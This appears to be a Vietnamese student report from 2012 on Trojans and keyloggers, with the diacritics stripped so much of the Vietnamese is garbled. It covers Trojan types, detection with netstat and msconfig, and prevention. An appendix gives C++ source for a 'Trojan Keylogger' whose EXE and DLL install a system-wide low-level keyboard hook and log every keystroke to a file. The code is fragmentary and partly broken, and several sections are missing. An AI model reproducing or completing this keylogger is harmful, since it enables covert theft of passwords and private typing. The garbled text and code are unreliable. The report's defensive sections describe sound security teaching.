Professional Documents
Culture Documents
:
:
Nng 2012
MC LC
MC LC....................................................................................................................2
Chng 1. C S L THUYT.................................................................................3
1.1 Gii thiu................................................................................................................3
1.2 Tm hiu v Trojan.................................................................................................5
1.2.1 Cc dng Trojans c bn:.................................................................................5
1.2.2 Mc ch ca nhng k vit ra nhng Trojans:.................................................5
1.2.3 Nhng con ng my tnh nn nhn nhim Trojan:...................................6
1.2.4 Nhng cch nhn bit mt my tnh b nhim Trojan:......................................6
1.3 Gii thiu v KeyLogger........................................................................................7
1.3.1 KeyLogger l g?..............................................................................................7
1.3.2 Phn loi KeyLogger:.......................................................................................7
1.3.3 Cch hot ng ca KeyLogger:.......................................................................8
1.4 Cch pht hin v phng chng..............................................................................9
1.4.1 Cch pht hin Trojan:......................................................................................9
1.4.2 Cch phng chng:.........................................................................................13
Chng 2. PHN TCH V THIT K CHNG TRNH....................................14
2.1 M t bi ton.......................................................................................................14
2.2 Phn tch yu cu..................................................................................................14
2.2.1 Yu cu v chc nng:....................................................................................14
2.2.2 Yu cu v giao din ngi dng:..................................................................14
2.2.3 Yu cu v tng thch:..................................................................................14
2.3 Phn tch chc nng..............................................................................................14
2.4 K thut Hook.......................................................................................................14
2.4.1 Gii thiu:.......................................................................................................14
2.4.2 Chui Hook:...................................................................................................15
2.4.3 Th tc Hook:.................................................................................................15
2.4.4 Cch s dng Hook:.......................................................................................16
2.5 Thut ton.............................................................................................................17
2.5.1 Hm WriteStringToFile(char *txt):................................................................17
2.5.2 Hm LogKeyboard:........................................................................................17
Chng 3. TRIN KHAI NH GI KT QU....................................................18
3.1 Mi trng trin khai............................................................................................18
3.2 Kt qu chc nng chng trnh...........................................................................18
3.3 u v nhc im.................................................................................................20
3.3.1 u im:.........................................................................................................20
3.3.2 Nhc im:...................................................................................................20
3.4 Hng pht trin...................................................................................................20
20
TI LIU THAM KHO..........................................................................................21
PH LC...................................................................................................................22
Chng 1.
1.1
C S L THUYT
Gii thiu
Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh.
Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my
Tm hiu v Trojan
K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi
1.2.1
* Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa.
* Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng.
* Destructive Trojans Ph hy h thng.
* Denied-of-Service DoS Attack Trojan: Trojans cho tn cng DoS.
* Proxy Trojans.
* HTTP, FTP Trojans - Trojan t to thnh HTTP hay FTP server k tn
cng khai thc li.
* Security Software Disable Trojan.
1.2.2
1.2.3
* CD-ROM t ng m ra ng vo.
* My tnh c nhng du hiu l trn mn hnh.
* Hnh nn ca cc ca s Windows b thay i
* Cc vn bn t ng in.
* My tinh t ng thay i font ch v cc thit lp khc.
* Hnh nn my tnh t ng thay i v khng th i li.
* Chut tri, chut phi ln ln.
* Chut khng hin th trn mn hnh.
* Nt Start khng hin th.
1.3
KeyLogger l g?
Keylogger hay "trnh theo di thao tc bn phm" theo cch dch ra ting
Vit l mt chng trnh my tnh ban u c vit nhm mc ch theo di v ghi
li mi thao tc thc hin trn bn phm vo mt tp tin nht k (log) cho ngi ci
t n s dng. V chc nng mang tnh vi phm vo ring t ca ngi khc ny nn
cc trnh keylogger c xp vo nhm cc phn mm gin ip.
V sau, khi keylogger pht trin cao hn n khng nhng ghi li thao tc bn
phm m cn ghi li c cc hnh nh hin th trn mn hnh (screen) bng cch chp
(screen-shot) hoc quay phim (screen-capture) thm ch cn ghi nhn cch con
tr chut trn my tnh di chuyn.
1.3.2
Keylogger bao gm hai loi, mt loi keylogger phn cng v mt loi l phn
mm.
Kh tho g?
C kh nng ly nhim, chng tt (kill process)?
C mi cu tr li "c", cho mt im. im cng cao, keylogger cng vt
khi mc ch gim st (monitoring) n vi mc ch do thm (spying) v tnh nguy
him n cng cao. Keylogger c th c phn loi theo s im:
Loi s 1
Khng im: keylogger loi bnh thng; chy cng khai, c thng bo cho
ngi b theo di, ng vi mc ch gim st.
Loi s 2
Loi s 3
Loi s 4
1.3.3.1
Tp tin hook, hoc l mt chng trnh monitor dng ghi nhn li cc thao
tc bn phm, capture screen (y l phn quan trng nht)
Tp tin nht k (log), ni cha ng/ghi li ton b nhng g hook ghi nhn
c.
Ngoi ra, ty theo loi c th c thm phn chng trnh bo v (guard,
protect), chng trnh thng bo (report)
1.3.3.2
Cch thc ci t vo my
Cch hot ng
- Dng cu lnh Netstat an trong windows bit h thng ang lng nghe
trn cc port no.
+ Hnh di ta thy c port 7777 y l port ca Tini Trojan.
+ Ta thy port 8800 ang ch nghe v c my ang kt ni n, c th
l ca Trojans.
1.4.1.2
1.4.1.3
- Trong Startup
- Trong Registry: a s s nm ti y: Chng ta s dng cu lnh Msconfig
trong Table Startup chng trnh no mun chy t ng s phi nm ti y.
Trong v d ny c file nc.exe chy lc khi ng v tr ca n l ti folder
c:\vnexperts.net
1.4.2
- Khng s dng cc phn mm khng tin tng (i khi tin tng vn b dnh
Trojans).
- Khng vo cc trang web nguy him, khng ci cc ActiveX v JavaScript
trn cc trang web bi c th s nh km Trojans.
- Ti quan trng l phi update OS thng xuyn.
- Ci phn mm dit virus uy tn nh: Kaspersky Internet Security, Norton
Internet Security, v Mcafee Total Security. Sau khi ci cc phn mm ny bn hy
update n thng xuyn.
Chng 2.
2.1
M t bi ton
Xy dng mt chng trnh Trojan Keylogger c kh nng ghi li cc thao tc
Phn tch yu cu
2.2.1
Yu cu v chc nng:
Yu cu v tng thch:
2.4
K thut Hook
2.4.1
Gii thiu:
hook nhng thng ip tht cn thit v kt thc vic hook ngay khi khng dng n
na.
Cc m hnh Hook:
- Local hook: l k thut Hook dng by s kin ngay trong tin trnh ci
t.
- Remote hook: l k thut Hook cho php by cc s kin thuc tin trnh ca
ng dng khc. Trong m hnh ny li tn ti hai kiu hook khc :
+ Thread-specific : kiu Hook ny s by s kin ca mt lung c th.
+ System-wide : by s kin ca tt c cc lung trong tt c cc tin
trnh ang thi hnh trong h thng.
Thnh phn ca Hook:
Chui Hook
Th tc Hook
Cc kiu Hook
2.4.2
Chui Hook:
Th tc Hook:
tin trnh khc. V vy, khng c cch no gii phng DLL. H thng ch c th
gii phng DLL khi tt c cc tin trnh lin kt ti DLL phi kt thc hoc gi
FreeLibrary.
Gii php t ra cho vn ny l xy dng hm ci t ngay trong th vin
DLL. Bng vic lin kt ti DLL, ng dng c th ci t hook. V ngay trong DLL
cng phi c hm gii phng hook gii phng khi khng cn n na.
2.5
Thut ton
2.5.1
Hm WriteStringToFile(char *txt):
Hm LogKeyboard:
Chng 3.
3.1
TRIN KHAI NH GI KT QU
3.2
3.3
u v nhc im
Sau khi trin khai chy th ng dng, nhm chng em rt ra cc nhn xt nh
gi sau:
3.3.1
u im:
Nhc im:
- Website wikipedia.org
- Software Requirement Specification Template IEEE
- An Analysis of the System
Salman A. Baset and Henning Schulzrinne
Department of Computer Science
Columbia University, New York NY 10027
{salman,hgs}@cs.columbia.edu
September 15, 2004
PH LC
Tp tin thi hnh Jaam.exe
#include "stdafx.h"
#include <windows.h>
/* Declare Windows procedure */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable */
char szClassName[ ] = "WindowsApp";
HINSTANCE hinstDLL;
HHOOK hHook = NULL;
typedef VOID (*LOADPROC)(HHOOK hHook);
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
hinstDLL = LoadLibrary(TEXT("Hooker"));
if (hinstDLL == NULL) { MessageBox(0,L"Not found.",L"Error",0); return 0; }
HOOKPROC hpr = (HOOKPROC)GetProcAddress(hinstDLL,"LogKeyboard");
if (hpr == NULL) { MessageBox(0,L"Unvail lib.",L"Error",0); return 0; }
hHook = SetWindowsHookEx(WH_KEYBOARD_LL, hpr, hinstDLL, 0);
if (hHook == NULL) { MessageBox(0,L"Corrupt lib.",L"Error",0); return 0; }
LOADPROC lpr = (LOADPROC)GetProcAddress(hinstDLL,"SetGlobalHook");
lpr(hHook);
HWND hwnd;
MSG messages;
}
return 0;
Th vin Hooker.dll
// dllmain.cpp : Defines the entry point for the DLL application.
#include <windows.h>
#include <conio.h>
#include <stdio.h>
#include <ctype.h>
#include <string>
#include <tchar.h>
#include <stdio.h>
#include <psapi.h>
#pragma data_seg(".SHARDAT")
HHOOK hGlobalHook = NULL;
FILE *out;
#pragma data_seg()
int PrintModules( DWORD processID );
void WriteStringToFile(char *txt);
void WriteEnterToFile();
LRESULT CALLBACK LogKeyboard(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION && wParam == WM_KEYDOWN)
{
bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);
bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
bool isDownCtrl = ((GetKeyState(VK_CONTROL) & 0x80) == 0x80 ? true : false);
byte keyState[256];
GetKeyboardState(keyState);
WORD w;
KBDLLHOOKSTRUCT* keycode = (KBDLLHOOKSTRUCT*)lParam;
if (keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");
if (keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");
if (keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}");
if (keycode->vkCode == VK_HOME) WriteStringToFile("{Home}");
if (keycode->vkCode == VK_END) WriteStringToFile("{End}");
if (keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}");
if (keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}");
if (keycode->vkCode == VK_UP) WriteStringToFile("{Up}");
if (keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");
else if (ToAscii(keycode->vkCode,
keycode->scanCode,
keyState,
&w,
keycode->flags) == 1)
{
char key = (char)w;
out=fopen(str,"a");
fprintf(out,"%s",txt);
fclose(out);